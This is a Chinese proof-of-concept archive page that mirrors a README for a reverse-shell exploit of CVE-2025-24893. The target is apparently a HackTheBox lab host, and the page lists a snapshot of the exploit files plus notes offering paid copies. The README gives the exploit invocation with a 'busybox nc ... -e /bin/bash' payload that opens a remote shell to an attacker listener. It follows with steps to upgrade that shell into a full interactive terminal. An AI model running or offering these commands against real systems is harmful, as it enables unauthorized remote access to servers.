关联漏洞
            
        
        
            介绍
            # Reverse shell for CVE-2025-24893
```bash
 python3 CVE-2025-24893.py  -u http://wiki.editor.htb/ -c "busybox nc <listener ip> <listener port> -e /bin/bash"
```
## upgrade the shell
1. `python3 -c 'import pty; pty.spawn("/bin/bash")'`
2. `ctrl + z`
3. `stty size`
4. `stty raw -echo; fg`
5. `stty rows x columns y`
6. `export TERM=xterm`
        
        文件快照
        
            
                
 [4.0K]  /data/pocs/6495419db3d0aeaa5d106cacf87607ef52c437c6
├── [1.0K]  CVE-2025-24893.py
└── [ 340]  README.md
0 directories, 2 files
                
             
         
        备注
        
            
                1. 建议优先通过来源进行访问。
                2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
                3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。